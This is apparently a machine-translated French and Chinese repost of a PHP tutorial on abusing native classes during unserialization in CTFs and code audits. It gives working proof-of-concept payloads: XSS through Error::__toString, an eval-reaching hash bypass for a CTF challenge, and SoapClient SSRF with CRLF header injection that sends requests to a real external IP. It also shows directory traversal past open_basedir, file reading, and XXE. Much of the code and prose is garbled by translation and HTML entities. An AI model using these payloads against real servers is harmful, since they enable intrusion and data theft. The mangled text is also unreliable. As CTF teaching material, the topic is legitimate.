Maison  >  Article  >  développement back-end  >  Compréhension approfondie de PHP désérialisant les classes natives

Compréhension approfondie de PHP désérialisant les classes natives

WBOY
WBOYavant
2022-05-17 11:56:516811parcourir

Cet article vous apporte des connaissances pertinentes sur PHP, qui introduit principalement l'utilisation de classes natives désérialisées. S'il existe une fonction de désérialisation dans l'audit de code ou ctf, mais qu'elle ne peut pas être construite. Si une chaîne pop complète est créée, alors comment devrait-elle le faire. nous brisons la situation ? Jetons-y un coup d'oeil. J'espère que cela sera utile à tout le monde.

Compréhension approfondie de PHP désérialisant les classes natives

Étude recommandée : "Tutoriel vidéo PHP"

Une brève analyse de l'utilisation des classes natives de désérialisation PHP

S'il y a un point de fonction de désérialisation dans l'audit de code ou ctf, mais qu'il ne peut pas être construit Pop complète chaîne, comment devrions-nous briser la situation en ce moment ? Nous pouvons essayer de commencer avec des classes natives PHP. Certaines classes natives PHP ont des méthodes magiques intégrées. Si nous construisons intelligemment des paramètres contrôlables, déclenchons et utilisons leurs méthodes magiques intégrées, il est possible d'atteindre certains des objectifs que nous souhaitons. .

1. Méthodes magiques communes

__wakeup() //执行unserialize()时,先会调用这个函数
__sleep() //执行serialize()时,先会调用这个函数
__destruct() //对象被销毁时触发
__call() //在对象上下文中调用不可访问的方法时触发
__callStatic() //在静态上下文中调用不可访问的方法时触发
__get() //用于从不可访问的属性读取数据或者不存在这个键都会调用此方法
__set() //用于将数据写入不可访问的属性
__isset() //在不可访问的属性上调用isset()或empty()触发
__unset() //在不可访问的属性上使用unset()时触发
__toString() //把对象当作字符串使用时触发
__invoke() //当尝试将对象调用为函数时触发

2. Méthodes magiques dans les classes natives

Nous utilisons le script suivant pour parcourir les méthodes magiques dans toutes les classes natives

<?php $classes = get_declared_classes();foreach ($classes as $class) {
    $methods = get_class_methods($class);
    foreach ($methods as $method) {
        if (in_array($method, array(
            &#39;__destruct&#39;,
            &#39;__toString&#39;,
            &#39;__wakeup&#39;,
            &#39;__call&#39;,
            &#39;__callStatic&#39;,
            &#39;__get&#39;,
            &#39;__set&#39;,
            &#39;__isset&#39;,
            &#39;__unset&#39;,
            &#39;__invoke&#39;,
            &#39;__set_state&#39;
        ))) {
            print $class . &#39;::&#39; . $method . "\n";
        }
    }}

3.

Error/Exception

Error est la classe de base pour toutes les classes d'erreurs internes de PHP. (PHP 7, 8)

**Error::__toString ** La représentation sous forme de chaîne de l'erreur

Renvoie la représentation sous forme de chaîne de l'erreur.

Exception est la classe de base pour toutes les exceptions au niveau utilisateur. (PHP 5, 7, 8)

**Exception ::__toString ** Convertit l'objet d'exception en chaîne

Renvoie l'exception convertie en type chaîne (string). "Attribut de classe"

XSS

Le

__toString La méthode renverra une erreur ou une exception sous la forme d'une chaîne, qui contient les paramètres que nous avons saisis. Si nous construisons une chaîne de code XSS et la combinons avec un rendu d'écho, la vulnérabilité XSS réfléchie sera déclenchée

Exemple :
    <?php $a = unserialize($_GET[&#39;a&#39;]);echo $a;
  • POC :

    <?php $a = new Error("<script>alert('xss')");$b = serialize($a);echo urlencode($b);
  • hash bypass
  • Regardons d'abord une question

  • [2020 Geek Challenge] Greatphp

    <?phperror_reporting (0);class SYCLOVER {
        public $syc;
        public $lover;
        public function __wakeup(){
            if( ($this->syc != $this->lover) && (md5($this->syc) === md5($this->lover)) && (sha1($this->syc)=== sha1($this->lover)) ){
               if(!preg_match("/\syc, $match)){
                   eval($this->syc);
               } else {
                   die("Try Hard !!");
               }
    
            }
        }}if (isset($_GET['great'])){
        unserialize($_GET['great']);} else {
        highlight_file(__FILE__);}
  • Besoin de contourner deux comparaisons de hachage fortes, et doit finalement construire un code d'évaluation pour exécution
    Évidemment normal La méthode ne fonctionnera pas, mais elle peut être contournée via les classes nativesDe même, lorsque les fonctions md5() et sha1() traitent des objets, la méthode __tostring sera automatiquement appelée

    Jetons un bref coup d'œil à sa sortie en premier

    <?php $a=new Error("payload",1);$b=new Error("payload",2);$c=new Exception("payload",3);
    $d=new Exception("payload",4);
    echo $a."<br>";
    echo $b."<br>";
    echo $c."<br>";
    echo $d;

    On peut constater que les informations renvoyées par ces deux classes natives sont exactement les mêmes à l'exception du numéro de ligne. En utilisant cela, nous pouvons essayer de contourner la fonction de hachage. les deux objets entrants doivent être placés sur la même ligne

    Compréhension approfondie de PHP désérialisant les classes natives Par conséquent, nous pouvons effectuer un test simple et constater que l'utilisation de cette méthode peut contourner la comparaison de fonctions de hachage forte (faible)

    <?php $a = new Error("payload",1);$b = new Error("payload",2);if ($a!=$b){
        echo &#39;$a不等于$b&#39;."\n";}if (md5($a)===md5($b)){
        echo "md5值相等\n";}if (sha1($a)===sha1($b)){
        echo "sha1值相等";}
    Selon ces points de connaissance, nous pouvons construire facilement la charge utile

      <?phpclass  SYCLOVER {
    	public $syc;
    	public $lover;
    	public function __wakeup(){
    		if( ($this->syc != $this->lover) && (md5($this->syc) === md5($this->lover)) && (sha1($this->syc)=== sha1($this->lover)) ){
    		   if(!preg_match("/\syc, $match)){
    			   eval($this->syc);
    		   } else {
    			   die("Try Hard !!");
    		   }
    		   
    		}
    	}}$str = "?>=include~".urldecode("%D0%99%93%9E%98")."?>";//两次取反绕过正则$a=new Error($str,1);
    	$b=new Error($str,2);
    	$c = new SYCLOVER();$c->syc = $a;$c->lover = $b;
    	echo(urlencode(serialize($c)));?>
    SoapClient

    SoapClient

    est une classe spécialisée utilisée pour accéder aux services Web peut fournir un client PHP qui accède aux services Web basés sur le protocole SOAP. Elle peut créer des messages de données Soap et interagir avec l'interface wsdl. . Le module d'extension SOAP est fermé par défaut et doit être activé manuellement lors de son utilisation. SoapClient::__call

    — Appeler une fonction SOAP (PHP 5, 7, 8)

    Normalement, une fonction SOAP peut être appelée en tant que fonction SOAP. méthode de l'objet SoapClient

    SSRF

    Constructeur : Compréhension approfondie de PHP désérialisant les classes natives

    public SoapClient :: SoapClient(mixed $wsdl [,array $options ])
    第一个参数是用来指明是否是wsdl模式,如果为`null`,那就是非wsdl模式。
    第二个参数为一个数组,如果在wsdl模式下,此参数可选;如果在非wsdl模式下,则必须设置location和uri选项,其中location是要将请求发送到的SOAP服务器的URL,而uri 是SOAP服务的目标命名空间。
    Qu'est-ce que soap

    SOAP 是基于 XML 的简易协议,是用在分散或分布的环境中交换信息的简单的协议,可使应用程序在 HTTP 之上进行信息交换
    SOAP是webService三要素(SOAP、WSDL、UDDI)之一:WSDL 用来描述如何访问具体的接口, UDDI用来管理,分发,查询webService ,SOAP(简单对象访问协议)是连接或Web服务或客户端和Web服务之间的接口。
    其采用HTTP作为底层通讯协议,XML作为数据传送的格式。
    us Construisez une charge utile d'exploit, le premier paramètre est NULL et l'emplacement du deuxième paramètre est défini sur l'adresse vps

    <?php $a = new SoapClient(null, array(
    &#39;location&#39; => 'http://47.102.146.95:2333', 
    'uri' =>'uri',
    'user_agent'=>'111111'));
    $b = serialize($a);
    echo $b;
    $c = unserialize($b);
    $c->a();
    Écoutez le port 2333 du vps. Comme le montre la figure ci-dessous, SSRF est déclenché avec succès. Le vps reçoit les informations de la demande

    Compréhension approfondie de PHP désérialisant les classes natives et peut les voir. SOAPAction et user_agent sont contrôlables

    Lors des tests locaux, il a été constaté que lors de l'utilisation de cette classe intégrée (c'est-à-dire le protocole Soap) pour demander un port où un service existe, une erreur sera immédiatement signalée, et lors de l'accès à un port où le service n'existe pas (inoccupé), elle attendra pendant un certain temps pour signaler une erreur, et vous pouvez l'utiliser pour détecter les actifs intranet.

    Si vous coopérez avec la vulnérabilité CRLF, vous pouvez également utiliser SoapClient pour contrôler d'autres paramètres ou envoyer des données par courrier. Par exemple : protocole HTTP pour attaquer Redis

    Expansion des connaissances CRLF

    HTTP报文的结构:状态行和首部中的每行以CRLF结束,首部与主体之间由一空行分隔。
    CRLF注入漏洞,是因为Web应用没有对用户输入做严格验证,导致攻击者可以输入一些恶意字符。
    攻击者一旦向请求行或首部中的字段注入恶意的CRLF(\r\n),就能注入一些首部字段或报文主体,并在响应中输出。
    En combinant CRLF, nous pouvons utiliser SoapClient+CRLF pour faire plus de choses, comme insérer des cookies personnalisés,

    <?php $a = new SoapClient(null, array(
        &#39;location&#39; => 'http://47.102.146.95:2333',
        'uri' =>'uri',
        'user_agent'=>"111111\r\nCookie: PHPSESSION=dasdasd564d6as4d6a"));
        $b = serialize($a);echo $b;$c = unserialize($b);$c->a();

    发送POST的数据包,这里需要将Content-Type设置为application/x-www-form-urlencoded,我们可以通过添加两个\r\n来将原来的Content-Type挤下去,自定义一个新的Content-Type

    <?php $a = new SoapClient(null, array(
        &#39;location&#39; => 'http://47.102.146.95:2333',
        'uri' =>'uri',
        'user_agent'=>"111111\r\nContent-Type: application/x-www-form-urlencoded\r\nX-Forwarded-For: 127.0.0.1\r\nCookie: PHPSESSID=3stu05dr969ogmprk28drnju93\r\nContent-Length: 10\r\n\r\npostdata"));
        $b = serialize($a);echo $b;$c = unserialize($b);$c->a();

    Compréhension approfondie de PHP désérialisant les classes natives

    看一道ctfshow上的题,完美利用上述知识点

    $xff = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
    array_pop($xff);
    $ip = array_pop($xff); //获取xff头
    
    
    if($ip!=='127.0.0.1'){
        die('error');
    }else{
        $token = $_POST['token'];
        if($token=='ctfshow'){
            file_put_contents('flag.txt',$flag);
        }
    }

    poc:

    <?php $target = &#39;http://127.0.0.1/flag.php&#39;;
    $post_string = &#39;token=ctfshow&#39;;
    $b = new SoapClient(null,array(&#39;location&#39; => $target,'user_agent'=>'wupco^^X-Forwarded-For:127.0.0.1,127.0.0.1^^Content-Type: application/x-www-form-urlencoded'.'^^Content-Length: '.(string)strlen($post_string).'^^^^'.$post_string,'uri'=> "ssrf"));
    $a = serialize($b);
    $a = str_replace('^^',"\r\n",$a);
    echo urlencode($a);
    ?>

    DirectoryIterator/FilesystemIterator

    DirectoryIterator类提供了一个简单的接口来查看文件系统目录的内容。

    DirectoryIterator::__toString 获取字符串形式的文件名 (PHP 5,7,8)

    目录遍历

    使用此内置类的__toString方法结合glob或file协议,即可实现目录遍历

    例如:

    <?php $a = new DirectoryIterator("glob:///*");
    foreach ($a as $b){
        echo $b.&#39;<br>';
    }

    FilesystemIterator继承于DirectoryIterator,两者作用和用法基本相同,区别为FilesystemIterator会显示文件的完整路径,而DirectoryIterator只显示文件名

    Compréhension approfondie de PHP désérialisant les classes natives

    因为可以配合使用glob伪协议(查找匹配的文件路径模式),所以可以绕过open_basedir的限制

    在php4.3以后使用了zend_class_unserialize_deny来禁止一些类的反序列化,很不幸的是这两个原生类都在禁止名单当中

    SplFileObject

    SplFileObject 类为单个文件的信息提供了一个面向对象的高级接口

    (PHP 5 >= 5.1.2, PHP 7, PHP 8)

    文件读取

    SplFileObject::__toString — 以字符串形式返回文件的路径

    <?phphighlight_file (__file__);$a = new SplFileObject("./flag.txt");echo $a;/*foreach($context as $f){
        echo($a);
    }*/

    如果没有遍历的话只能读取第一行,且受到open_basedir影响

    SimpleXMLElement

    解析XML 文档中的元素。 (PHP 5、PHP 7、PHP 8)

    SimpleXMLElement::__construct — 创建一个新的 SimpleXMLElement 对象

    XXE

    我们查看一下其参数:

    Compréhension approfondie de PHP désérialisant les classes natives

    根据官方文档,发现当第三个参数为True时,即可实现远程xml文件载入,第二个参数的常量值设置为2即可。

    利用可参考赛题:[SUCTF 2018]Homework

    ReflectionMethod

    获取注释内容

    (PHP 5 >= 5.1.0, PHP 7, PHP 8)

    ReflectionFunctionAbstract::getDocComment — 获取注释内容
    由该原生类中的getDocComment方法可以访问到注释的内容

    Compréhension approfondie de PHP désérialisant les classes natives

    同时可利用的原生类还有ZipArchive– 删除文件等等,不在叙述

    推荐学习:《PHP视频教程

    Ce qui précède est le contenu détaillé de. pour plus d'informations, suivez d'autres articles connexes sur le site Web de PHP en chinois!

    Déclaration:
    Cet article est reproduit dans:. en cas de violation, veuillez contacter admin@php.cn Supprimer